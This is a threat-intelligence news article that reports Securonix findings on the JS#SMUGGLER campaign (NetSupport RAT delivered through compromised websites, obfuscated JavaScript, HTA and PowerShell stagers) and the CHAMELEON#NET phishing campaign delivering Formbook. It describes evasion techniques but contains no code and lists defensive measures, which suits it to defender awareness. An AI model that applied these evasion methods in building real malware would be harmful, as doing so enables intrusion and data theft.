Cybersecurity researchers have recently highlighted a concerning new campaign called JS#SMUGGLER, which is utilizing compromised websites to distribute a remote access trojan known as NetSupport RAT. An analysis conducted by Securonix reveals a sophisticated attack chain that involves three primary components: an obfuscated JavaScript loader embedded within a compromised website, an HTML Application (HTA) that executes encrypted PowerShell stagers using “mshta.exe,” and a PowerShell payload designed to download and run the main malware.
According to researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee, NetSupport RAT provides attackers with comprehensive control over victim hosts. This includes remote desktop access, file operations, command execution capabilities, data theft, and proxy functions. At this point in time, there is minimal evidence linking this campaign to any specific threat group or nation, but the activity predominantly targets enterprise users via compromised websites, suggesting an extensive operational effort.
The researchers describe the operation as a multi-stage, web-based malware deployment that employs hidden iframes, obfuscated loaders, and layered script execution techniques to facilitate malware installation and remote control. The initial phase of the attack features silent redirects embedded in infected websites, allowing the retrieval of a heavily scrambled JavaScript loader, referred to as “phone.js,” from an external domain. This loader assesses the device it is executed on, determining whether to display a full-screen iframe for mobile users or to load an additional remote script for desktop users.
The invisible iframe is designed to redirect users to a malicious URL, and the JavaScript loader employs a tracking mechanism to ensure that its malicious activities are triggered only once during the victim’s first visit, thereby minimizing the likelihood of detection. This adaptive mechanism allows attackers to tailor their infection process, concealing malicious actions in specific environments and enhancing their success rate by delivering payloads suited to the particular platform.
In subsequent stages of the attack, the remote script initialized in the first phase constructs a URL from which an HTA payload is downloaded and executed using “mshta.exe.” This HTA payload acts as a secondary loader for a temporary PowerShell stager, which is decrypted and executed in memory to evade detection. Additionally, the HTA file is designed to run covertly, disabling visible window elements and minimizing at startup. Upon execution, the decrypted payload also removes the PowerShell stager from disk and terminates itself to leave a minimal forensic footprint.
The primary objective of the PowerShell payload is to retrieve and deploy NetSupport RAT, thereby granting attackers complete control over the compromised system. Securonix noted the sophistication of the operation and the layered evasion techniques employed, suggesting a professionally maintained malware framework. To effectively combat such attacks, they recommend implementing strong Content Security Policy (CSP) enforcement, script monitoring, PowerShell logging, mshta.exe restrictions, and behavioral analytics.
The announcement of the JS#SMUGGLER campaign follows closely on the heels of another multi-stage malspam operation, CHAMELEON#NET, recently analyzed by the same cybersecurity firm. This earlier campaign was designed to deliver Formbook, a keylogger and information-stealing malware, using phishing emails to target individuals in the National Social Security Sector. These emails trick victims into downloading a seemingly harmless archive, which then initiates a complex infection chain.
The initial phase of the CHAMELEON#NET campaign starts with a phishing email that prompts users to download a .BZ2 archive. The payload—an obfuscated JavaScript file—serves as a dropper, leading to the execution of a sophisticated VB.NET loader. This loader employs advanced reflection and a customized conditional XOR cipher for decryption.
The JavaScript dropper also creates two additional JavaScript files in the %TEMP% directory. The first, svchost.js, drops a .NET loader executable named DarkTortilla (“QNaZg.exe”), a crypter frequently used for distributing subsequent payloads. The second file, adobe.js, releases an MSI installer package titled “PHat.jar,” which behaves similarly to svchost.js.
Ultimately, the loader is configured to decrypt and run an embedded DLL containing the Formbook malware, ensuring persistence by adding itself to the Windows startup folder or managing persistence via the Windows Registry. The researchers emphasize that the threat actors effectively combine social engineering tactics, heavy script obfuscation, and advanced .NET evasion methods to compromise their targets successfully. The custom decryption routines, followed by reflective loading, allow the final payload to execute in a fileless manner, complicating detection and forensic analysis significantly.
